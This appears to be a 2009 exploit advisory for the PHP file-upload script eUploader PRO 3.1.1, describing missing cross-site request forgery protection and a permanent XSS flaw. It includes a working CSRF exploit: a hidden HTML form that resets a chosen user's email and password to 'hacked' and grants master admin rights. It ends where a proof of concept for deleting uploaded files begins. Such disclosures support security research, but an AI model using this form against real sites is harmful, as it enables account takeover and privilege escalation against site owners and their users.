1 [#−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−#]
2 [#] Title: eUploader PRO 3.1.1 (XSRF/XSS) Multiple Vulnerabilities
3 [#] Author: Milos Zivanovic
4 [#] Email: milosz.security[at]gmail.com
5 [#] Date: 16. December 2009.
6 [#−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−#]
7 [#] Application: eUploader PRO
8 [#] Version: 3.1.1
9 [#] Platform: PHP
10 [#] Link: http://www.euploaderpro.com/
11 [#] Price: ~70 USD
12 [#] Vulnerability: Permanent XSS and XSRF Vulnerabilities
13 [#−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−#]
14
15 Word or two: I’ve tested version 3.1.1 but i’m sure that other
16 versions are vulnerable to following exploits.
17
18 [#]Content
19 |−−Edit user settings (Add admin privilege)
20 |−−Remove item by id
21 |−−Edit appearance − Permanent XSS
22
23 [*]Edit user settings (Add admin privilege)
24
25 On eUploader PRO script there is no cross site request forgery
26 protection and we can use this to edit any user’s profile and set him
27 regular or master admin privileges, change email and password. The
28 only thing required is ID of the user we want to edit.
29
30 [EXPLOIT−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−]
31 <form action="http://localhost/admin.php?page=user&id=[ID]" method="post">
32 <input type="hidden" name="id" value="[ID]">
33 <input type="hidden" name="admin_access" value="2">
34 <input type="hidden" name="email" value="my@email.com">
35 <input type="hidden" name="pass" value="hacked">
36 <input type="hidden" name="pass2" value="hacked">
37 <input type="submit" name="edit" value="Submit">
38 </form>
39 [EXPLOIT−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−]
40
41 [−]Remove item by id
42
43 This will remove uploaded file by its id.
44
45 [POC−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−